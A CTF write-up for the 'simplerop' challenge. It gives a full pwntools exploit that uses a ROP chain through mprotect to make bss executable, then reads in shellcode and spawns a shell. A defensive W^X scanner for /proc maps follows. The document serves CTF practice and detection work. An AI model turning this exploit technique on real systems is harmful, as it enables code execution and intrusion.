cmcc

Technology  2023-05-15  96

For background on mprotect, see the mprotect reference. The target is a statically linked executable: use mprotect to make the bss segment executable, read shellcode into it, then jump to it to get a shell…

```python
from pwn import *

context.log_level = 'debug'
proc_name = './simplerop'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25491)
elf = ELF(proc_name)

mprotect_addr = elf.sym['mprotect']
# clears the low 12 bits, i.e. page-aligns the bss address (mprotect needs a page-aligned start)
bss_start = elf.bss() & ~(elf.bss() % (4 * 1024))
read_addr = elf.sym['read']
rop = 0x0804838c  # mainly to keep the stack balanced: this gadget pops mprotect's three arguments

# chain: mprotect(bss_start, 0x400, 7) -> read(0, bss_start, 0x400) -> return into bss_start
payload = b'a' * (0x1c + 0x4)
payload += p32(mprotect_addr) + p32(rop) + p32(bss_start) + p32(0x400) + p32(0x7)
payload += p32(read_addr) + p32(bss_start) + p32(0) + p32(bss_start) + p32(0x400)
p.sendlineafter(b'input :', payload)
p.sendline(asm(shellcraft.i386.sh()))
p.interactive()
```
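Added as a defender-side companion example, not part of the original writeup: the mprotect(…, 7) call above leaves a whole page of bss mapped writable and executable, which is exactly what a W^X check over /proc/<pid>/maps flags. The sample maps contents below are constructed (addresses modelled on a 32-bit static binary), and `scan_pid` is a helper assumed for live use.

```python
import re
from typing import List, NamedTuple


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


# One /proc/<pid>/maps line: "start-end perms offset dev inode [path]"
_MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")


def parse_maps(text: str) -> List[Mapping]:
    """Parse the text of a /proc/<pid>/maps file into Mapping records."""
    out = []
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if m:
            out.append(Mapping(int(m.group(1), 16), int(m.group(2), 16), m.group(3), m.group(4)))
    return out


def find_wx_regions(text: str) -> List[Mapping]:
    """Return mappings that are both writable and executable (W^X violations)."""
    return [m for m in parse_maps(text) if "w" in m.perms and "x" in m.perms]


def scan_pid(pid: int) -> List[Mapping]:
    """Scan a live process (needs permission to read its maps file)."""
    with open(f"/proc/{pid}/maps") as f:
        return find_wx_regions(f.read())


# Constructed sample: a 32-bit static binary after mprotect(bss_page, 0x400, 7).
# mprotect works on whole pages, so the entire 4 KiB bss page now shows rwxp.
SAMPLE_MAPS = """\
08048000-080e9000 r-xp 00000000 08:01 1234 /tmp/simplerop
080e9000-080eb000 rw-p 000a0000 08:01 1234 /tmp/simplerop
080eb000-080ec000 rwxp 00000000 00:00 0
080ec000-08111000 rw-p 00000000 00:00 0 [heap]
f7ffd000-f7fff000 r-xp 00000000 00:00 0 [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    for m in find_wx_regions(SAMPLE_MAPS):
        print(f"W+X mapping {m.start:#x}-{m.end:#x} {m.perms} {m.path}")
```

On a hardened host this check is cheap to run periodically; any anonymous rwxp region in a process that does not JIT is worth an alert.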
